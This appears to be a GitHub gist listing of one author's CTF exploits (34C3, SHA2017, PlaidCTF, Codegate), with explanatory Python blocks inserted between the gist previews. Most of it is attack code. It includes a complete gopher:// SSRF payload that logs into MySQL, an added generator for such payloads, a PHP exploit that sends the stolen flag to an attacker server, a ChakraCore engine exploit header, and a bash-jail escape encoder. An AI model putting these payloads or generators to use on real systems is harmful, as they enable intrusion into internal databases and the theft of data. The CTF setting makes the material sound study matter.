@eboda
eboda / doit
Last active June 13, 2018 06:10
34C3 CTF minbashmaxfun exploit
nc minbashmaxfun 1337 -v <<<$(python solve.py file dump_flag.sh )
@eboda
eboda / foo
Created December 29, 2017 20:07
34C3 CTF extract0r solution
gopher://foo@[cafebabe.cf]@yolo.com:3306/A%48%00%00%01%85%a6%3f%20%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%6d%34%73%74%33%72%5f%6f%76%33%72%6c%30%72%64%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%00%4c%01%00%00%03%73%65%6c%65%63%74%20%63%6f%6e%63%61%74%28%63%61%73%74%28%30%78%35%30%34%62%30%33%30%34%30%61%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%36%34%30%30%30%30%30%30%36%34%30%30%30%30%30%30%30%61%30%30%30%30%30%30%36%37%36%39%36%64%36%64%36%35%35%66%36%36%36%63%36%31%36%37%20%61%73%20%62%69%6e%61%72%79%29%2c%20%72%70%61%64%28%66%6c%61%67%2c%20%31%30%30%2c%20%27%41%27%29%2c%20%63%61%73%74%28%30%78%35%30%34%62%30%31%30%32%31%65%30%33%30%61%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%36%34%30%30%30%30%30%30%36%34%30%30%30%30%30%30%30%61%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%36%37%36%39%36%64%36%64%36%35%35%
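The URL above is a gopher:// payload carrying a raw MySQL client conversation to port 3306: a HandshakeResponse41 login packet (sequence id 1, capability flags 0x203fa685, user m4st3r_ov3rl0rd, empty password, mysql_native_password plugin) followed by a COM_QUERY packet whose statement builds the flag into a zip structure with concat/rpad. The Python below is an added example, not code from the gist, that assembles such a payload from its parts; the capability flags are copied from the gist's packet so the output starts with the same bytes, the host and statement are constructed placeholders, the gopher item type character is `_` instead of the gist's `A`, and the double-`@` host trick in the original URL is not reproduced.

```python
import struct

# Capability flags copied from the gist's first packet (bytes %85%a6%3f%20, little-endian)
CLIENT_CAPABILITIES = 0x203fa685
CLIENT_PLUGIN_AUTH = 0x00080000
CLIENT_CONNECT_ATTRS = 0x00100000


def mysql_packet(seq, payload):
    """MySQL wire framing: 3-byte little-endian payload length, 1-byte sequence id."""
    return struct.pack('<I', len(payload))[:3] + bytes([seq]) + payload


def handshake_response(user, caps=CLIENT_CAPABILITIES, plugin=b'mysql_native_password'):
    """HandshakeResponse41 for an account with an empty password.

    An empty password means an empty auth-response, so the packet does not depend on
    the salt in the server greeting; that is what lets a write-only, fire-and-forget
    gopher:// payload log in at all. A non-empty password would need the salt."""
    body = struct.pack('<IIB', caps, 0x01000000, 33)  # capabilities, max packet, utf8
    body += b'\x00' * 23                               # reserved
    body += user.encode() + b'\x00'                    # NUL-terminated user name
    body += b'\x00'                                    # auth-response length 0
    if caps & CLIENT_PLUGIN_AUTH:
        body += plugin + b'\x00'                       # NUL-terminated plugin name
    if caps & CLIENT_CONNECT_ATTRS:
        body += b'\x00'                                # lenenc length 0: no attributes
    return mysql_packet(1, body)  # seq 1: reply to the server greeting, which is seq 0


def com_query(sql):
    """COM_QUERY (0x03) carrying the statement; a fresh command starts at sequence id 0."""
    return mysql_packet(0, b'\x03' + sql.encode())


def gopher_url(host, port, raw):
    """Percent-encode every byte. The first path character is the gopher item type;
    the client strips it, so it never reaches the socket."""
    return 'gopher://%s:%d/_%s' % (host, port, ''.join('%%%02x' % b for b in raw))


def login_and_query_url(host, port, user, sql):
    """Login packet followed by one query, as a single gopher:// URL."""
    return gopher_url(host, port, handshake_response(user) + com_query(sql))


if __name__ == '__main__':
    # constructed host and statement; the gist's query is far longer
    print(login_and_query_url('db.internal', 3306, 'm4st3r_ov3rl0rd', 'select 1'))
```

The percent-encoding of every byte (rather than only the unsafe ones) avoids the client's own URL decoding mangling NUL bytes or `%` characters inside the MySQL frames.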
@eboda
eboda / exploit.php
Last active December 29, 2017 22:52
34C3 CTF urlstorage exploit
<?php
$target = 'http://127.0.0.1/';
$exploit = 'http://yourserver:1337/exploit.php';
$exfil = 'http://yourserver:1337/FLAG=';
// encode every byte of $s as an unpadded backslash-hex escape (\hh)
function enc($s) {
$res = '';
for ($i = 0; $i < strlen($s); $i++) {
$res .= '\\' . dechex(ord($s[$i]));
}
return $res;
}
@eboda
eboda / sha2017.md
Created June 11, 2017 08:19
SHA2017 web100 writeup

SHA2017 web100

Web100 asked us to connect to the website from 12 IPs in 12 different countries. Instead of using proxies, you could simply set the X-Forwarded-For header to an IP from the required country, because the check trusted that client-supplied header. A list of country-to-IP mappings can be found at http://www.nirsoft.net/countryip/nl.html. After doing this 12 times, it returned the flag.
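The bypass works because the challenge derived the client's location from a header the client controls. As an added example that is not part of the writeup, the Python below puts the naive lookup the challenge evidently used next to a hardened version that honours X-Forwarded-For only when the TCP peer is one of the application's own reverse proxies, and then takes the rightmost hop that is not a proxy. The trusted-proxy range and the twelve addresses (taken from the RFC 5737 documentation ranges, not from the country list linked above) are constructed.

```python
import ipaddress

# assumption: the application's own reverse proxies live in this range
TRUSTED_PROXIES = [ipaddress.ip_network('10.0.0.0/8')]

# constructed placeholders from the RFC 5737 documentation ranges; a real run would
# take one address per target country from a country-to-IP list instead
SPOOFED_IPS = ['192.0.2.%d' % i for i in range(1, 5)] + \
              ['198.51.100.%d' % i for i in range(1, 5)] + \
              ['203.0.113.%d' % i for i in range(1, 5)]


def forged_headers(ip):
    """Headers the attacker sends: no proxy needed, just claim the address."""
    return {'X-Forwarded-For': ip}


def naive_client_ip(remote_addr, headers):
    """Lookup the challenge evidently used: believe X-Forwarded-For unconditionally."""
    xff = headers.get('X-Forwarded-For')
    return xff.split(',')[0].strip() if xff else remote_addr


def _is_trusted_proxy(ip, trusted):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in trusted)


def hardened_client_ip(remote_addr, headers, trusted=TRUSTED_PROXIES):
    """Only honour the header when the TCP peer is one of our proxies, then walk the
    chain from the right: the first hop that is not a trusted proxy is the real client.
    Anything the client prepended to the header sits further left and is never reached."""
    if not _is_trusted_proxy(remote_addr, trusted):
        return remote_addr
    hops = [h.strip() for h in headers.get('X-Forwarded-For', '').split(',') if h.strip()]
    for hop in reversed(hops):
        if not _is_trusted_proxy(hop, trusted):
            return hop
    return remote_addr


def distinct_clients(lookup, remote_addr, ips=SPOOFED_IPS):
    """How many different client addresses `lookup` reports for one attacker that sends
    the twelve forged headers from a single real address."""
    return len({lookup(remote_addr, forged_headers(ip)) for ip in ips})


if __name__ == '__main__':
    print('naive   :', distinct_clients(naive_client_ip, '198.51.100.77'))
    print('hardened:', distinct_clients(hardened_client_ip, '198.51.100.77'))
```

With the naive lookup one attacker appears as twelve clients; with the hardened one every request resolves to the real peer, and a forged header only matters if it arrives through a trusted proxy that then appends the true peer address to its right.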

@eboda
eboda / pwn.py
Last active June 11, 2017 08:15
SHA2017 crypto writeup
import requests
from PIL import Image
from StringIO import StringIO  # Python 2 era gist; on Python 3 this is io.BytesIO
def get_flag_rgb():
    # fetch the flag image and sample one pixel every 40 px along x;
    # pixel() is the gist's own helper, defined further down and not shown in this preview
    rgb = []
    flag = requests.get("https://cryptoengine.stillhackinganyway.nl/flag").content
    for i in range(20, 480, 40):
        rgb.append(pixel(flag, i))
    return rgb
@eboda
eboda / exploit.js
Last active September 14, 2021 13:20
Exploit for Chakrazy challenge from PlaidCTF 2017 - ChakraCore exploit
////////////////////////////////////////////////////////////////////////////
//
// The vulnerability was that the following line of code could change the type of the
// underlying Array from JavascriptNativeIntArray to JavascriptArray:
//
// spreadableCheckedAndTrue = JavascriptOperators::IsConcatSpreadable(aItem) != FALSE;
//
// As can be seen in the provided .diff, the check for whether the type of the pDestArray has changed
// was removed. If the aItem then is not a JavascriptArray, the following code path is taken:
// else
@eboda
eboda / go.py
Created December 29, 2016 22:10
hohoho solution
import sys
# digit -> bash arithmetic built only from the characters $ ? [ ] + * ( ) /;
# relies on $? being 1 (exit status of a previous failing command) and on $$ (the PID)
# being larger than 1, so that $?/$$ is 0 in integer arithmetic
m = {
'0' : '$[$?/$$]',
'1' : '$?',
'2' : '$[$?+$?]',
'3' : '$[$?+$?+$?]',
'4' : '$[$?+$?+$?+$?]',
'5' : '$[$?+$?+$?+$?+$?]',
'6' : '$[($?+$?+$?)*($?+$?)]',
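The table above maps each digit to a bash arithmetic expression over the characters $ ? [ ] + * ( ) /, relying on $? being 1 and $$ being a PID larger than 1; the preview stops at 6 and does not show how the digits are combined. The Python below is an added example, not the gist's code: it generates the per-digit table for all ten digits, extends it to arbitrary non-negative integers with nested $[ ] expansions (Horner's scheme), and includes an offline model of bash's $[ ] arithmetic so the generated expressions can be checked without a shell. The PID value used by the model is an assumption.

```python
import re

PID = 4242  # assumption: the jailed shell's $$; anything larger than 1 behaves the same

ALLOWED = set('$?[]+*()/')


def digit_expr(d):
    """One digit using only the allowed characters; $? is assumed to be 1, as in the gist."""
    if d == 0:
        return '$[$?/$$]'                       # 1 / PID == 0 in integer arithmetic
    if d == 1:
        return '$?'
    return '$[' + '+'.join(['$?'] * d) + ']'   # 2..9 as a sum of ones


TEN = '$[($?+$?)*($?+$?+$?+$?+$?)]'             # 2 * 5


def number_expr(n):
    """Horner's scheme: n == (n // 10) * 10 + n % 10, nested $[ ] for any n >= 0."""
    if n < 10:
        return digit_expr(n)
    return '$[%s*%s+%s]' % (number_expr(n // 10), TEN, digit_expr(n % 10))


def bash_eval(expr, status=1, pid=PID):
    """Offline model of bash $[ ] arithmetic for the subset emitted here: non-negative
    operands with + * and truncating /. Inner $[ ] expansions become parentheses."""
    py = expr.replace('$?', str(status)).replace('$$', str(pid))
    py = py.replace('$[', '(').replace(']', ')').replace('/', '//')
    if not re.fullmatch(r'[0-9+*/()]+', py):    # nothing but arithmetic reaches eval
        raise ValueError('unexpected characters in ' + expr)
    return eval(py)


def charset_ok(expr):
    return set(expr) <= ALLOWED


if __name__ == '__main__':
    e = number_expr(2016)
    print(e, '->', bash_eval(e))
```

The expression for a number grows linearly with the number of digits, which is acceptable for the small integers a jail escape usually needs (port numbers, byte values); `bash_eval` refuses anything that is not plain arithmetic, so it cannot be used to smuggle Python into `eval`.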
@eboda
eboda / template.py
Created May 7, 2015 13:10
pwn template
#!/usr/bin/env python
import sys
import socket
import struct
import telnetlib
import time
import re
import string
@eboda
eboda / exploit.py
Created March 17, 2015 11:55
codegate ctf BOOKSTORE exploit
#!/usr/bin/env python
#coding: UTF-8
import struct
import socket
import telnetlib
import sys
if len(sys.argv) > 1 and sys.argv[1] == "l":
print "=== local exploit"